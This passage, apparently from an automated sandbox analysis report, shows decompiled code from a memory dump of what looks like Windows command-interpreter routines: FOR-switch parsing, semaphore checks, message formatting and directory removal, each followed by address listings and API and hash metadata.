				} else {
					_t63 = 0;
					E002AF030(0);
				}
				_t88 = 0x2b;
				if(E002ADCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x2e3cc9 == 0) {
						L13:
						if( *0x2dfaa0 != _t36) {
							L45:
							E002C82EB(_t63);
							L17:
							_push(0x2dfaa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E002A9C73( *(_t101 + 0x38), _t89);
							E002A9C4D(L"IN");
							_push(0x2dfaa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E002A9C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E002A9936(_t60);
							E002A9C4D(L"DO");
							_push(0x2dfaa0);
							_t91 = 8;
							E002B1040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E002ADC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E002C82EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x2dfaa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x2dfaa2 & 0x0000ffff;
						if(E002AD7D4(L"=,;",  *0x2dfaa2 & 0x0000ffff) != 0 ||  *0x2dfa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x2dfaa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x2dfaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E002AF030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x2dfaa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x2dfaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E002AF030(0);
								_t36 =  *0x2dfaa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E002C82EB(_t80);
								}
								_t63 = 6 +  *0x2dfa8c * 2;
								_t52 = E002B00B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E002C9287(_t63);
									__imp__longjmp(0x2db8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E002C82EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x2dfa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E002B1040(_t52, _t94, 0x2dfaa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x2dfaa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E002AF030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E002C82EB(0);
								}
								_t36 =  *0x2dfaa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x2dfa8c * 2;
									_t52 = E002B00B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x2dfa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}























                                              0x002a9a34
                                              0x002a9a36
                                              0x002a9a3e
                                              0x002a9a40
                                              0x002c1097
                                              0x002c109d
                                              0x002c109d
                                              0x002a9a48
                                              0x002a9a49
                                              0x002a9a58
                                              0x002a9a5c
                                              0x002a9a5f
                                              0x002c10a3
                                              0x002c10ab
                                              0x002c10ac
                                              0x002c10b4
                                              0x002a9a65
                                              0x002a9a65
                                              0x002a9a67
                                              0x002a9a67
                                              0x002a9a6e
                                              0x002a9a76
                                              0x002c10bf
                                              0x002c10c3
                                              0x00000000
                                              0x002a9a7c
                                              0x002a9a7c
                                              0x002a9a89
                                              0x002a9a8a
                                              0x002a9b0a
                                              0x002a9b11
                                              0x002c1154
                                              0x002c1154
                                              0x002a9b57
                                              0x002a9b5f
                                              0x002a9b60
                                              0x002a9b63
                                              0x002a9b64
                                              0x002a9b6e
                                              0x002a9b76
                                              0x002a9b77
                                              0x002a9b7a
                                              0x002a9b7b
                                              0x002a9b8a
                                              0x002a9b8d
                                              0x002a9b95
                                              0x002a9b9b
                                              0x002a9b9c
                                              0x002a9ba3
                                              0x002a9ba4
                                              0x002a9ba9
                                              0x002a9bae
                                              0x002c115e
                                              0x002c115e
                                              0x002a9bb5
                                              0x002a9bb8
                                              0x002a9bb8
                                              0x002a9b1f
                                              0x002a9b25
                                              0x002a9b28
                                              0x00000000
                                              0x00000000
                                              0x002a9b35
                                              0x002a9b3a
                                              0x002a9b44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9a8c
                                              0x002a9a8f
                                              0x002a9a99
                                              0x002a9aa3
                                              0x00000000
                                              0x00000000
                                              0x002a9aa9
                                              0x002a9ab3
                                              0x002a9abd
                                              0x002a9c3b
                                              0x002a9c19
                                              0x002a9c1b
                                              0x002a9a8f
                                              0x002a9a99
                                              0x002a9aa3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9aa3
                                              0x00000000
                                              0x002a9a8f
                                              0x002a9acd
                                              0x002a9ad7
                                              0x002a9bb9
                                              0x002a9bbf
                                              0x002a9bc4
                                              0x002a9bcc
                                              0x002a9bcd
                                              0x002a9bd0
                                              0x00000000
                                              0x00000000
                                              0x002a9bd8
                                              0x002a9bd9
                                              0x002a9bdc
                                              0x00000000
                                              0x00000000
                                              0x002a9be2
                                              0x002a9be6
                                              0x002a9c46
                                              0x002a9c46
                                              0x002a9bed
                                              0x002a9bf4
                                              0x002a9bf9
                                              0x002a9bfb
                                              0x002c1127
                                              0x002c1127
                                              0x002c1132
                                              0x002c1138
                                              0x002c1138
                                              0x002c113b
                                              0x002c1141
                                              0x002c1144
                                              0x002c114a
                                              0x002c114a
                                              0x002c1144
                                              0x002a9b07
                                              0x002a9b09
                                              0x00000000
                                              0x002a9c01
                                              0x002a9c07
                                              0x002a9c0a
                                              0x002a9c11
                                              0x002a9c14
                                              0x00000000
                                              0x002a9c14
                                              0x002a9bfb
                                              0x002a9ae7
                                              0x002a9aef
                                              0x002a9af4
                                              0x002c10d1
                                              0x002c10d6
                                              0x002c10db
                                              0x002c10df
                                              0x002c10e1
                                              0x002c10e1
                                              0x002c10e6
                                              0x002c10ee
                                              0x002c10ef
                                              0x002c10f2
                                              0x00000000
                                              0x002c10f8
                                              0x002c10fa
                                              0x002c10fb
                                              0x002c10fe
                                              0x00000000
                                              0x00000000
                                              0x002c1109
                                              0x002c1110
                                              0x002c1115
                                              0x002c1117
                                              0x00000000
                                              0x00000000
                                              0x002c111f
                                              0x00000000
                                              0x002c111f
                                              0x002c10f2
                                              0x002a9afc
                                              0x00000000
                                              0x002a9c25
                                              0x002a9c25
                                              0x002a9c28
                                              0x00000000
                                              0x00000000
                                              0x002a9c2e
                                              0x002a9c30
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9c36
                                              0x002a9c41
                                              0x002a9c41
                                              0x00000000
                                              0x002a9c41
                                              0x002a9a8f
                                              0x002a9a8a

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp$iswspace
                                              • String ID: =,;$FOR/?
                                              • API String ID: 759518647-2121398454
                                              • Opcode ID: ac52e652bc52b4a9282144af92dc62042cecbb09a0360c74c349ee116b372819
                                              • Instruction ID: 901f27ada1c11125418f6db6343f65a437ba5e84240b23ca0eaf88970fb40e61
                                              • Opcode Fuzzy Hash: ac52e652bc52b4a9282144af92dc62042cecbb09a0360c74c349ee116b372819
                                              • Instruction Fuzzy Hash: 1C6107312347428BDB28AB26BD5EB2633A1EB87710F14442FE507865D1DEB09CF5CA19
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E002C213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E002C292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E002C2913("wil");
				}
				return _t16;
			}











                                              0x002c213f
                                              0x002c2140
                                              0x002c2146
                                              0x002c214a
                                              0x002c214c
                                              0x002c2155
                                              0x002c2170
                                              0x002c2183
                                              0x002c2188
                                              0x002c21ca
                                              0x002c21d9
                                              0x002c21e8
                                              0x002c21fd
                                              0x00000000
                                              0x002c220c
                                              0x002c220e
                                              0x002c2217
                                              0x002c2225
                                              0x00000000
                                              0x002c2227
                                              0x00000000
                                              0x002c2227
                                              0x002c2219
                                              0x00000000
                                              0x002c2219
                                              0x002c2217
                                              0x002c21ea
                                              0x00000000
                                              0x002c21ea
                                              0x002c21db
                                              0x00000000
                                              0x002c21db
                                              0x002c218a
                                              0x002c2199
                                              0x002c21a2
                                              0x002c21b1
                                              0x00000000
                                              0x002c222e
                                              0x002c222e
                                              0x002c2231
                                              0x002c2233
                                              0x002c2233
                                              0x002c219b
                                              0x00000000
                                              0x002c219b
                                              0x002c2199
                                              0x002c2179
                                              0x002c223c
                                              0x002c224a
                                              0x002c224f
                                              0x002c224f
                                              0x002c2157
                                              0x002c215c
                                              0x002c2164
                                              0x002c2164
                                              0x002c2257

                                              APIs
                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,002C2CF5), ref: 002C214C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ObjectSingleWait
                                              • String ID: wil
                                              • API String ID: 24740636-1589926490
                                              • Opcode ID: a19924ff8360ffb38e30e9acecf8dbcdf84f2f31fcc59a0445481aee0e6d1106
                                              • Instruction ID: 9893a5dca749e4f16a84ae32c1d6cdd4f7786155c3b70f1ac8768aa40d3adeee
                                              • Opcode Fuzzy Hash: a19924ff8360ffb38e30e9acecf8dbcdf84f2f31fcc59a0445481aee0e6d1106
                                              • Instruction Fuzzy Hash: EB315434760206EBEB204E659D88F6A365DDF41350F24423AFE09DA281DEB4CD699652
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C7C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E002C7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E002B6B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E002ABED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E002AB6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E002B0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E002B6FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}





















                                              0x002c7c83
                                              0x002c7c83
                                              0x002c7c8b
                                              0x002c7c92
                                              0x002c7c96
                                              0x002c7c9d
                                              0x002c7ca5
                                              0x002c7cb9
                                              0x002c7cbf
                                              0x002c7cc4
                                              0x002c7d3e
                                              0x002c7d48
                                              0x002c7d4d
                                              0x002c7d59
                                              0x002c7d5d
                                              0x002c7d5d
                                              0x002c7d65
                                              0x002c7d6b
                                              0x002c7cc6
                                              0x002c7ccf
                                              0x002c7ce0
                                              0x002c7cef
                                              0x002c7cf9
                                              0x002c7d09
                                              0x002c7d0c
                                              0x002c7d11
                                              0x002c7d13
                                              0x002c7d13
                                              0x002c7d18
                                              0x002c7d31
                                              0x002c7d39
                                              0x00000000
                                              0x002c7d3b
                                              0x002c7d3b
                                              0x002c7d3b
                                              0x002c7d39
                                              0x002c7d7c

                                              APIs
                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 002C7CB9
                                              • _ultoa.MSVCRT ref: 002C7CCF
                                              • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 002C7CD8
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,002CA21D,000000FF,?,00000020), ref: 002C7CF9
                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 002C7D31
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 002C7D65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                              • String ID: (#$Application$System
                                              • API String ID: 3377411628-593978566
                                              • Opcode ID: 7c4085d4518742405bc497ca69f8a2fa53bbff3bf65c6e72a2d9866dcbc8153c
                                              • Instruction ID: 875da0c7bb19bdab952b1686ce30d422381cba51acbefbbf402d4c2d6a1e47f3
                                              • Opcode Fuzzy Hash: 7c4085d4518742405bc497ca69f8a2fa53bbff3bf65c6e72a2d9866dcbc8153c
                                              • Instruction Fuzzy Hash: 29319031A10209ABDB108F65DC49EEE77B9EF89710F10422EF902EB181EB309911CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A8885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E002A8885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E002B6FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}


















                                              0x002a888d
                                              0x002a8894
                                              0x002a889c
                                              0x002a88a2
                                              0x002a88b1
                                              0x002c0638
                                              0x00000000
                                              0x002c0649
                                              0x002c0649
                                              0x002a88c8
                                              0x002a88d7
                                              0x002a88d7
                                              0x002c0638
                                              0x002a88b7
                                              0x002a88c0
                                              0x002c0656
                                              0x002c065b
                                              0x002c0662
                                              0x002c066b
                                              0x002c0695
                                              0x002c06a4
                                              0x002c0697
                                              0x002c0697
                                              0x002c0697
                                              0x002c0695
                                              0x002c066b
                                              0x002c065b
                                              0x002a88c6
                                              0x00000000

                                              APIs
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002A88A8
                                              • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002A88B8
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002C0650
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002C0662
                                              • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002C067E
                                              • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,002A8857,-00000105), ref: 002C068D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                              • String ID: :$\
                                              • API String ID: 3961617410-1166558509
                                              • Opcode ID: cfefee350166aa888d2a552704dac5412f763c9b528b867e8ac4b017d350526f
                                              • Instruction ID: 25a0e070f5e823aae02f878bba06bad51cfebb5d650380e05a844c789b72d13b
                                              • Opcode Fuzzy Hash: cfefee350166aa888d2a552704dac5412f763c9b528b867e8ac4b017d350526f
                                              • Instruction Fuzzy Hash: 8D11CA71A20119AF8720AF74EC8C97F77BCDB86760B90022DE912E7150EF788D61C591
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B2DD2, Relevance: 15.4, APIs: 10, Instructions: 400COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 64%
                                              			E002B2DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E002B0C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E002B4E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0x2e3cf0 = _t222;
						_t277 = 1;
						if(E002B4800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E002B0D89(1, 0x2a24ac);
							E002B0D89(1, 0x2a24ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E002B0D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E002B0D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E002B4C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E002CA834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E002AB610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E002B5266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E002B65F0,  !( ~(_t248 & 0x00004004)) & E002B6550, E002B64F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0x2cd544;
											if( *0x2cd544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E002AB6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E002AC5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E002AC5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E002B0D89(_t277, 0x2a24ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E002CA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E002B6FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E002AB610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E002CA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
